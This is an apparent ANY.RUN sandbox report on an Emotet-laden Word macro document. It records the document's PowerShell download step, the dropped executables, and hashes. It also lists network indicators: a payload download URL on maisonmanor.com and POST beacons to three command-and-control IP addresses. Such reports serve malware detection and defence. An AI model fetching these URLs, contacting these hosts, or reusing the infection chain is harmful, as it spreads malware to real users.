File name: File-7759-1758851631.doc
Full analysis: https://app.any.run/tasks/1497800b-7659-4ab9-bd1b-e54748cd4280
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a highly destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: May 24, 2019, 18:38:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, loader, emotet, emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Soft Mouse withdrawal monitor, Subject: Automotive, Author: Ivah Krajcik, Comments: Ergonomic Cotton Soap Licensed, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri May 24 14:58:00 2019, Last Saved Time/Date: Fri May 24 14:58:00 2019, Number of Pages: 1, Number of Words: 17, Number of Characters: 97, Security: 0
MD5: 94CF785576FC35776B5468066087E722
SHA1: 643EDE588E4C8CAB90B17579664B7E38792A2045
SHA256: FF9A18857B7F818301CB1E49D0C146F013F3B2F0116605F1D48B97EC80ED1433
SSDEEP:
3072:a77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qB+vCmhGTp1plceHl:a77HUUUUUUUUUUUUUUUUUUUT52V+Nmhy

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 441.exe (PID: 2904)
      • 441.exe (PID: 3860)
      • soundser.exe (PID: 2236)
      • soundser.exe (PID: 3836)
    • Downloads executable files from the Internet
      • powershell.exe (PID: 2788)
    • Emotet process was detected
      • soundser.exe (PID: 3836)
  • SUSPICIOUS
    • Executed via WMI
      • powershell.exe (PID: 2788)
    • Creates files in the user directory
      • powershell.exe (PID: 2788)
    • PowerShell script executed
      • powershell.exe (PID: 2788)
    • Executable content was dropped or overwritten
      • 441.exe (PID: 3860)
      • powershell.exe (PID: 2788)
    • Application launched itself
      • 441.exe (PID: 2904)
      • soundser.exe (PID: 3836)
    • Connects to server without host name
      • soundser.exe (PID: 2236)
    • Starts itself from another location
      • 441.exe (PID: 3860)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3948)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3948)
No Malware configuration.

TRiD
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF (FlashPix)
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Tasty Soft Mouse withdrawal monitor
Subject: Automotive
Author: Ivah Krajcik
Keywords: -
Comments: Ergonomic Cotton Soap Licensed
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:24 13:58:00
ModifyDate: 2019:05:24 13:58:00
Pages: 1
Words: 17
Characters: 97
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Jast, Nader and Gorczany
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 113
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs: Title, 1
Manager: Hackett
No data.
Total processes: 40
Monitored processes: 6
Malicious processes: 4
Suspicious processes: 0

Behavior graph (process chain recovered from the graph labels): winword.exe -> powershell.exe (drop and start) -> 441.exe -> 441.exe (drop and start) -> soundser.exe -> soundser.exe #EMOTET

Process information

PID: 3948
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\File-7759-1758851631.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2788
CMD: powershell -nop -e <base64-encoded command, omitted here; see the full report>
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2904
CMD: "C:\Users\admin\441.exe"
Path: C:\Users\admin\441.exe
Parent process: powershell.exe
User: admin
Company: VMware, Inc.
Integrity Level: MEDIUM
Description: VMware Resolution Set
Exit code: 0
Version: 9.6.2.31837

PID: 3860
CMD: --9eb38daf
Path: C:\Users\admin\441.exe
Parent process: 441.exe
User: admin
Company: VMware, Inc.
Integrity Level: MEDIUM
Description: VMware Resolution Set
Exit code: 0
Version: 9.6.2.31837

PID: 3836
CMD: "C:\Users\admin\AppData\Local\soundser\soundser.exe"
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: 441.exe
User: admin
Company: VMware, Inc.
Integrity Level: MEDIUM
Description: VMware Resolution Set
Exit code: 0
Version: 9.6.2.31837

PID: 2236
CMD: --3ab57678
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: soundser.exe
User: admin
Company: VMware, Inc.
Integrity Level: MEDIUM
Description: VMware Resolution Set
Version: 9.6.2.31837
Total events: 1,690
Read events: 1,209
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 9

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3E83.tmp.cvr | - | - | -
2788 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J2U8RJOFH1RS1CTPR5IP.temp | - | - | -
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\281D6261.wmf | wmf | 184A881C43C32297F194764ABBAA2B8C | EE2B30A208BB5BA80AA9B0E90656FBA7F997B360627D06F45EBFE03CBC66296C
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 88E0FDAC51BE8CD88823EE9CED442B44 | 3C559433287E3AB8E21AE3E2D70A4ED3D6300A2288C2B6DB4601AB7BB8F8657F
3948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | B19FF5CEFD1DA5D0F2805A945B570C3C | F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$le-7759-1758851631.doc | pgc | 919E584A721C4C7318641218302B2AD7 | 86268AA43D47D9C9302E500F189109E6480DA5A01266F03ECC21CC62980276B5
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2ECCF2C.wmf | wmf | C0BE899A2F7960FE616AFED86D4F2A35 | 4F91A8E0FEB18392C238C4D6B37525582E209910890FB432F0E793446D4A42A9
2788 | powershell.exe | C:\Users\admin\441.exe | executable | 1D015AC254436AA310322C7D96A9088B | 7AFE208A208B852FC2E40E66FD00FA8FD80C1CA080AED1075FDB657896DD6EEB
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE81FA1A.wmf | wmf | 360AD680C2F9C137D08AAAE304FB4B8B | 6E4A989C3C559FAA2DEEF0D2B5879D1AB3C59A6B7D08D1ABF4D01DAAB5590DEC
3948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBDE0D3D.wmf | wmf | 95B5BED7F2DADDF367D636778CE3C9E5 | 90325BBA44EEACA0DDB89CE8E0792505CD7EE37A788AF61B9D4080E8D7006ECD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 4
TCP/UDP connections: 4
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2236 | soundser.exe | POST | - | 76.86.20.103:80 | http://76.86.20.103/walk/teapot/ringin/merge/ | US | - | - | malicious
2236 | soundser.exe | POST | - | 5.67.205.99:80 | http://5.67.205.99/balloon/acquire/ | GB | - | - | malicious
2788 | powershell.exe | GET | 200 | 138.197.32.141:80 | http://www.maisonmanor.com/wp-content/unRpFYCwFf/ | US | executable | 107 Kb | suspicious
2236 | soundser.exe | POST | - | 144.139.247.220:80 | http://144.139.247.220/add/scripts/ringin/ | AU | - | - | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2236 | soundser.exe | 144.139.247.220:80 | - | Telstra Pty Ltd | AU | malicious
2788 | powershell.exe | 138.197.32.141:80 | www.maisonmanor.com | Digital Ocean, Inc. | US | suspicious
2236 | soundser.exe | 5.67.205.99:80 | - | Sky UK Limited | GB | malicious
2236 | soundser.exe | 76.86.20.103:80 | - | Time Warner Cable Internet LLC | US | malicious

DNS requests

Domain | IP | Reputation
www.maisonmanor.com | 138.197.32.141 | suspicious

Threats

PID | Process | Class | Message
2788 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2788 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2788 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
2788 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
2788 | powershell.exe | Misc activity | ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging)
No debug info